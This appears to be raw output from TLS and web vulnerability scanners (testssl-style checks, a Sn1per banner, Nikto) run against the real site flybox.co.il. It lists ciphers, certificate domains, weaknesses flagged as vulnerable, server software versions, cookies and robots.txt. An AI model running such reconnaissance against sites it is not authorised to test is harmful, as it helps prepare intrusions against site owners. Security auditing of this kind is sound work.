- *.snapcracka.us *.stokoonlinemurah.tk *.taeaj.tk
- *.techxpertsllc.com *.vbrs.co.uk
- *.wholesaleonline114.tk *.wholesaleonline4.tk
- *.wholesaleonline55.tk *.wittcatt.stream
- aonlineorder.tk bestproductthisyear.tk
- bigsale135store.tk bigsale171store.tk
- bigsale215store.tk bigsale248store.tk
- bigsale281store.tk bjfhiu.tk bsmartbuyer.tk
- bsmartonlineshop.tk btokoonlinemurah.tk
- budgettrouwfilm.nl dbranded.tk eawesomemarket.tk
- emmom.tk flybox.co.il fmarketplus.tk ftopbuy.tk
- h1xv9oacp.ga ialliexpress.tk iowist.com
- ipaytoko.tk iperfectmarket.tk ismartxpress.tk
- jsmartonlineshop.tk jtopcharts.tk lalliexpress.tk
- lpayperclick.tk lpremiumonlineshop.tk
- onlinekanyakumari.com osmartbuyer.tk
- pawesomemarket.tk pbelimudah.tk
- rlinkaliexpress.tk rnesaliexpress.tk
- samriddle.website snapcracka.us
- stokoonlinemurah.tk taeaj.tk techxpertsllc.com
- vbrs.co.uk wholesaleonline114.tk
- wholesaleonline4.tk wholesaleonline55.tk
- wittcatt.stream [m
- [1m Issuer [m[3mCOMODO ECC Domain Validation Secure Server CA 2[m ([3mCOMODO CA Limited[m from [3mGB[m)
- [1m Trust (hostname) [m[0;32mOk via SAN[m (SNI mandatory)
- [1m Chain of trust[m [0;32mOk [m[0;35m[m
- [1m EV cert[m (experimental) no
- [1m Certificate Expiration [m[0;32m176 >= 60 days[m (2017-12-16 19:00 --> 2018-06-25 19:59 -0400)
- [1m # of certificates provided[m 3
- [1m Certificate Revocation List [mhttp://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
- [1m OCSP URI [mhttp://ocsp.comodoca4.com
- [1m OCSP stapling [m[0;32moffered[m
- [1m OCSP must staple [mno
- [1m DNS CAA RR[m (experimental) [1;33mnot offered[m
- [1m Certificate Transparency [m[0;32myes[m (TLS extension)
- [1m[4m Testing HTTP header response @ "/" [m
- [1m HTTP Status Code [m 301 Moved Permanently, redirecting to "https://www.flybox.co.il/"
- [1m HTTP clock skew [m0 sec from localtime
- [1m Strict Transport Security [m--
- [1m Public Key Pinning [m--
- [1m Server banner [mcloudflare
- [1m Application banner [m[33m[1mX-Powered-By(B[m: PHP/[33m7(B[m.[33m0(B[m.[33m1(B[m[33m3(B[m
- [1m Cookie(s) [m3 issued: [0;33mNONE[m secure, [0;32m1/3[m HttpOnly -- maybe better try target URL of 30x
- [1m Security headers [m[0;33m--[m
- [1m Reverse Proxy banner [m--
- [1m[4m Testing vulnerabilities [m
- [1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m, no heartbeat extension
- [1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
- [1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m, no session tickets
- [1m ROBOT [m[1;32mServer does not support any cipher suites that use RSA key transport[m
- [1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
- [1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
- [1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
- [1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
- [1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
- [1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
- [1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
- [1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
- [1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
- no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
- [1m LOGJAM[m (CVE-2015-4000), experimental [0;32mnot vulnerable (OK):[m no DH EXPORT ciphers, no DH key detected
- [1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-ECDSA-AES128-SHA
- ECDHE-ECDSA-AES256-SHA [m
- [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
- [1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
- [1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
- [1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
- Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
- -----------------------------------------------------------------------------------------------------------------------------
- x1302 TLS13-AES-256-GCM-SHA384 ECDH[0;32m 253[m AESGCM 256 TLS_AES_256_GCM_SHA384
- xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH[0;32m 256[m ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
- xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
- xc024 ECDHE-ECDSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
- xc00a ECDHE-ECDSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
- xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH[0;32m 253[m ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
- x1301 TLS13-AES-128-GCM-SHA256 ECDH[0;32m 253[m AESGCM 128 TLS_AES_128_GCM_SHA256
- xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
- xc023 ECDHE-ECDSA-AES128-SHA256 ECDH[0;32m 256[m AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
- xc009 ECDHE-ECDSA-AES128-SHA ECDH[0;32m 256[m AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
- [1m[4m Running client simulations via sockets [m
- Android 2.3.7 No connection
- Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Android 4.3 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, [0;32m256 bit ECDH (P-256)[m
- Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, [0;32m256 bit ECDH (P-256)[m
- Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, [0;32m253 bit ECDH (X25519)[m
- Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
- Chrome 57 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
- Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Firefox 53 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
- IE 6 XP No connection
- IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- IE 8 XP No connection
- IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Opera 17 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Safari 7 iOS 7.1 TLSv1.2 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Java 6u45 No connection
- Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Java 8u31 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- [7m Done 2017-12-31 05:24:09 [ 247s] -->> 104.31.75.239:443 (flybox.co.il) <<--[m
- -----------------------------------------------------
- [7m Start 2017-12-31 05:24:09 -->> 104.31.74.239:443 (flybox.co.il) <<--[m
- further IP addresses: 104.31.75.239 2400:cb00:2048:1::681f:4bef
- 2400:cb00:2048:1::681f:4aef
- rDNS (104.31.74.239): --
- Service detected: HTTP
- [1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
- [1m SSLv2 [m[1;32mnot offered (OK)[m
- [1m SSLv3 [m[1;32mnot offered (OK)[m
- [1m TLS 1 [moffered
- [1m TLS 1.1 [moffered
- [1m TLS 1.2 [m[1;32moffered (OK)[m
- [1m TLS 1.3 [m[1;32moffered (OK)[m: draft 18
- [1m SPDY/NPN [mh2, spdy/3.1, http/1.1 (advertised)
- [1m HTTP2/ALPN [mh2, spdy/3.1, http/1.1 (offered)
- [1m[4m Testing ~standard cipher categories [m
- [1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
- [1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
- [1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
- [1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
- [1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
- [1m Triple DES Ciphers (Medium) [mnot offered (OK)
- [1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
- [1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
- [1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
- [0;32m PFS is offered (OK)[m TLS13-AES-256-GCM-SHA384
- TLS13-CHACHA20-POLY1305-SHA256
- ECDHE-ECDSA-CHACHA20-POLY1305-OLD
- ECDHE-ECDSA-AES256-GCM-SHA384
- ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
- ECDHE-ECDSA-CHACHA20-POLY1305
- TLS13-AES-128-GCM-SHA256
- ECDHE-ECDSA-AES128-GCM-SHA256
- ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
- [1m Elliptic curves offered: [msecp224r1 [0;32mprime256v1[m [0;32msecp384r1[m [0;32msecp521r1[m [0;32mX25519[m
- [1m[4m Testing server preferences [m
- [1m Has server cipher order? [m[1;32myes (OK)[m
- [1m Negotiated protocol [m[1;32mTLSv1.3[m
- [1m Negotiated cipher [m[1;32mTLS13-AES-256-GCM-SHA384[m, [0;32m253 bit ECDH (X25519)[m
- [1m Cipher order[m
- TLSv1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.1: ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
- TLSv1.2: ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
- ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
- ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
- ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
- TLSv1.3: TLS13-AES-256-GCM-SHA384 TLS13-CHACHA20-POLY1305-SHA256
- TLS13-AES-128-GCM-SHA256
- [1m[4m Testing server defaults (Server Hello) [m
- [1m TLS extensions (standard) [m"renegotiation info/#65281" "server name/#0"
- "session ticket/#35" "status request/#5"
- "next protocol/#13172" "EC point formats/#11"
- "extended master secret/#23"
- "signed certificate timestamps/#18"
- "application layer protocol negotiation/#16"
- [1m Session Ticket RFC 5077 hint [m64800 seconds, session tickets keys seems to be rotated < daily
- [1m SSL Session ID support [myes
- [1m Session Resumption [mTickets: yes, ID: yes
- [1m TLS clock skew[m -1 sec from localtime
- [1m Signature Algorithm [m[0;32mECDSA with SHA256[m
- [1m Server key size [mECDSA [0;32m256[m bits
- [1m Fingerprint / Serial [mSHA1 241F2CD8DFACDEAEB1AEB7104A94653708701987 / 4B78D31156C5EC99DAF67C53B1FDAC49
- SHA256 39F0EFA4589C2C3EE02214DE224E9EF7BAED9F31A533D05A131ED458E82F53EE
- [1m Common Name (CN) [m[3msni165065.cloudflaressl.com[m (request w/o SNI didn't succeed, usual for EC certificates)
- [1m subjectAltName (SAN) [m[3msni165065.cloudflaressl.com *.aonlineorder.tk
- *.bestproductthisyear.tk *.bigsale135store.tk
- *.bigsale171store.tk *.bigsale215store.tk
- *.bigsale248store.tk *.bigsale281store.tk
- *.bjfhiu.tk *.bsmartbuyer.tk
- *.bsmartonlineshop.tk *.btokoonlinemurah.tk
- *.budgettrouwfilm.nl *.dbranded.tk
- *.eawesomemarket.tk *.emmom.tk *.flybox.co.il
- *.fmarketplus.tk *.ftopbuy.tk *.h1xv9oacp.ga
- *.ialliexpress.tk *.iowist.com *.ipaytoko.tk
- *.iperfectmarket.tk *.ismartxpress.tk
- *.jsmartonlineshop.tk *.jtopcharts.tk
- *.lalliexpress.tk *.lpayperclick.tk
- *.lpremiumonlineshop.tk *.onlinekanyakumari.com
- *.osmartbuyer.tk *.pawesomemarket.tk
- *.pbelimudah.tk *.rlinkaliexpress.tk
- *.rnesaliexpress.tk *.samriddle.website
- *.snapcracka.us *.stokoonlinemurah.tk *.taeaj.tk
- *.techxpertsllc.com *.vbrs.co.uk
- *.wholesaleonline114.tk *.wholesaleonline4.tk
- *.wholesaleonline55.tk *.wittcatt.stream
- aonlineorder.tk bestproductthisyear.tk
- bigsale135store.tk bigsale171store.tk
- bigsale215store.tk bigsale248store.tk
- bigsale281store.tk bjfhiu.tk bsmartbuyer.tk
- bsmartonlineshop.tk btokoonlinemurah.tk
- budgettrouwfilm.nl dbranded.tk eawesomemarket.tk
- emmom.tk flybox.co.il fmarketplus.tk ftopbuy.tk
- h1xv9oacp.ga ialliexpress.tk iowist.com
- ipaytoko.tk iperfectmarket.tk ismartxpress.tk
- jsmartonlineshop.tk jtopcharts.tk lalliexpress.tk
- lpayperclick.tk lpremiumonlineshop.tk
- onlinekanyakumari.com osmartbuyer.tk
- pawesomemarket.tk pbelimudah.tk
- rlinkaliexpress.tk rnesaliexpress.tk
- samriddle.website snapcracka.us
- stokoonlinemurah.tk taeaj.tk techxpertsllc.com
- vbrs.co.uk wholesaleonline114.tk
- wholesaleonline4.tk wholesaleonline55.tk
- wittcatt.stream [m
- [1m Issuer [m[3mCOMODO ECC Domain Validation Secure Server CA 2[m ([3mCOMODO CA Limited[m from [3mGB[m)
- [1m Trust (hostname) [m[0;32mOk via SAN[m (SNI mandatory)
- [1m Chain of trust[m [0;32mOk [m[0;35m[m
- [1m EV cert[m (experimental) no
- [1m Certificate Expiration [m[0;32m176 >= 60 days[m (2017-12-16 19:00 --> 2018-06-25 19:59 -0400)
- [1m # of certificates provided[m 3
- [1m Certificate Revocation List [mhttp://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
- [1m OCSP URI [mhttp://ocsp.comodoca4.com
- [1m OCSP stapling [m[0;32moffered[m
- [1m OCSP must staple [mno
- [1m DNS CAA RR[m (experimental) [1;33mnot offered[m
- [1m Certificate Transparency [m[0;32myes[m (TLS extension)
- [1m[4m Testing HTTP header response @ "/" [m
- [1m HTTP Status Code [m 301 Moved Permanently, redirecting to "https://www.flybox.co.il/"
- [1m HTTP clock skew [m0 sec from localtime
- [1m Strict Transport Security [m--
- [1m Public Key Pinning [m--
- [1m Server banner [mcloudflare
- [1m Application banner [m[33m[1mX-Powered-By(B[m: PHP/[33m7(B[m.[33m0(B[m.[33m1(B[m[33m3(B[m
- [1m Cookie(s) [m3 issued: [0;33mNONE[m secure, [0;32m1/3[m HttpOnly -- maybe better try target URL of 30x
- [1m Security headers [m[0;33m--[m
- [1m Reverse Proxy banner [m--
- [1m[4m Testing vulnerabilities [m
- [1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m, no heartbeat extension
- [1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
- [1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m, no session tickets
- [1m ROBOT [m[1;32mServer does not support any cipher suites that use RSA key transport[m
- [1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
- [1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
- [1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
- [1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
- [1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
- [1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
- [1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
- [1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
- [1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
- no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
- [1m LOGJAM[m (CVE-2015-4000), experimental [0;32mnot vulnerable (OK):[m no DH EXPORT ciphers, no DH key detected
- [1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-ECDSA-AES128-SHA
- ECDHE-ECDSA-AES256-SHA [m
- [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
- [1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
- [1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
- [1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
- Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
- -----------------------------------------------------------------------------------------------------------------------------
- x1302 TLS13-AES-256-GCM-SHA384 ECDH[0;32m 253[m AESGCM 256 TLS_AES_256_GCM_SHA384
- xcc14 ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH[0;32m 256[m ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
- xc02c ECDHE-ECDSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
- xc024 ECDHE-ECDSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
- xc00a ECDHE-ECDSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
- xcca9 ECDHE-ECDSA-CHACHA20-POLY1305 ECDH[0;32m 253[m ChaCha20 256 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
- x1301 TLS13-AES-128-GCM-SHA256 ECDH[0;32m 253[m AESGCM 128 TLS_AES_128_GCM_SHA256
- xc02b ECDHE-ECDSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
- xc023 ECDHE-ECDSA-AES128-SHA256 ECDH[0;32m 256[m AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
- xc009 ECDHE-ECDSA-AES128-SHA ECDH[0;32m 256[m AES 128 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
- [1m[4m Running client simulations via sockets [m
- Android 2.3.7 No connection
- Android 4.1.1 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Android 4.3 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Android 4.4.2 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Android 5.0.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, [0;32m256 bit ECDH (P-256)[m
- Android 6.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, [0;32m256 bit ECDH (P-256)[m
- Android 7.0 TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, [0;32m253 bit ECDH (X25519)[m
- Chrome 51 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
- Chrome 57 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
- Firefox 49 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Firefox 53 Win 7 TLSv1.3 TLS13-AES-128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
- IE 6 XP No connection
- IE 7 Vista TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- IE 8 XP No connection
- IE 8 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win 8.1 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Edge 13 Win 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Edge 13 Win Phone 10 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Opera 17 Win 7 TLSv1.2 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Safari 7 iOS 7.1 TLSv1.2 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Safari 9 OS X 10.11 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Safari 10 OS X 10.12 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Apple ATS 9 iOS 9 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Tor 17.0.9 Win 7 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Java 6u45 No connection
- Java 7u25 TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Java 8u31 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- OpenSSL 1.0.1l TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- OpenSSL 1.0.2e TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- [7m Done 2017-12-31 05:28:17 [ 495s] -->> 104.31.74.239:443 (flybox.co.il) <<--[m
- -----------------------------------------------------
- [1mDone testing now all IP addresses (on port 443): [m104.31.75.239 104.31.74.239
- ââââ âââââ âââ ââââââ ââââââ ââââ âââ ââââââ ââââââ âââââââ [0m
- âââââââ âââââââââ âââ â âââ â âââââââ ââââ ââ â ââ â ââââ âââ[0m
- âââ âââââââ âââ â ââââ â ââââ ââââ âââââââ ââââ ââââ âââ ââ[0m
- âââ âââ âââââââââ â âââ â âââââââââ ââââ âââ â âââ â ââââ â[0m
- ââââ ââââ ââ âââââââââââââââââââââââââ ââââââââââââââââââââââââââââââââ [0m
- â ââ â â ââ âââââ âââ â ââ âââ â ââââââââââ âââ âââ ââ âââ ââ â âââ â [0m
- â â â â ââ ââ ââ â ââ ââ â ââââ â â â â â â â â â â â â â â [0m
- â â â â â â â â â â â â â â â â â â â [0m
- â â â â â â â â â â â â â [0m
- â â [0m
- [91m+ -- --=[MÃÅÅBÄ»ÃÃÄ V20160303 BÅž 1Å 3 @ ÄÅÃÅŽÄÅÈÃÃÄ»Ä - https://crowdshield.com[0m
- [91m+ -- --=[Scan Complete![0m
- [92m + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +[0m
- [94m+ -- --=[Checking if X-Content options are enabled on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking if X-Frame options are enabled on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking if X-XSS-Protection header is enabled on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking HTTP methods on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking if TRACE method is enabled on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking for META tags on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking for open proxy on flybox.co.il...[0m [93m
- [94m+ -- --=[Enumerating software on flybox.co.il...[0m [93m
- x-powered-by: PHP/7.0.13
- set-cookie: PHPSESSID=g357t8tsdioj6o4cv8kvsij2f4; expires=Thu, 14-Sep-2023 18:24:10 GMT; Max-Age=180000000; path=/
- server: cloudflare
- [94m+ -- --=[Checking if Strict-Transport-Security is enabled on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking for Flash cross-domain policy on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking for Silverlight cross-domain policy on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking for HTML5 cross-origin resource sharing on flybox.co.il...[0m [93m
- [94m+ -- --=[Retrieving robots.txt on flybox.co.il...[0m [93m
- User-agent: *
- Disallow: /wp-admin/
- Allow: /wp-admin/admin-ajax.php
- [94m+ -- --=[Retrieving sitemap.xml on flybox.co.il...[0m [93m
- [94m+ -- --=[Checking cookie attributes on flybox.co.il...[0m [93m
- set-cookie: __cfduid=d3aaf1e2b31c05c61168ba247f638c7a61514716107; expires=Mon, 31-Dec-18 10:28:27 GMT; path=/; domain=.flybox.co.il; HttpOnly
- set-cookie: PHPSESSID=sbq77vcrt38t8vklj1ld90liu3; expires=Thu, 14-Sep-2023 18:24:15 GMT; Max-Age=180000000; path=/
- set-cookie: qtrans_front_language=he; expires=Mon, 31-Dec-2018 10:24:15 GMT; Max-Age=31536000; path=/
- [94m+ -- --=[Checking for ASP.NET Detailed Errors on flybox.co.il...[0m [93m
- jQuery("input#footernewsletter").removeClass("error")
- jQuery("input#footernewsletter").addClass("error")
- if( returned_data.result == 'error' ) {
- <body class="rtl error404">
- [0m
- [92m + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +[0m
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.31.75.239
- + Target Hostname: flybox.co.il
- + Target Port: 443
- ---------------------------------------------------------------------------
- + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni165065.cloudflaressl.com
- Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
- Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
- + Start Time: 2017-12-31 05:28:31 (GMT-5)
- ---------------------------------------------------------------------------
- + Server: cloudflare
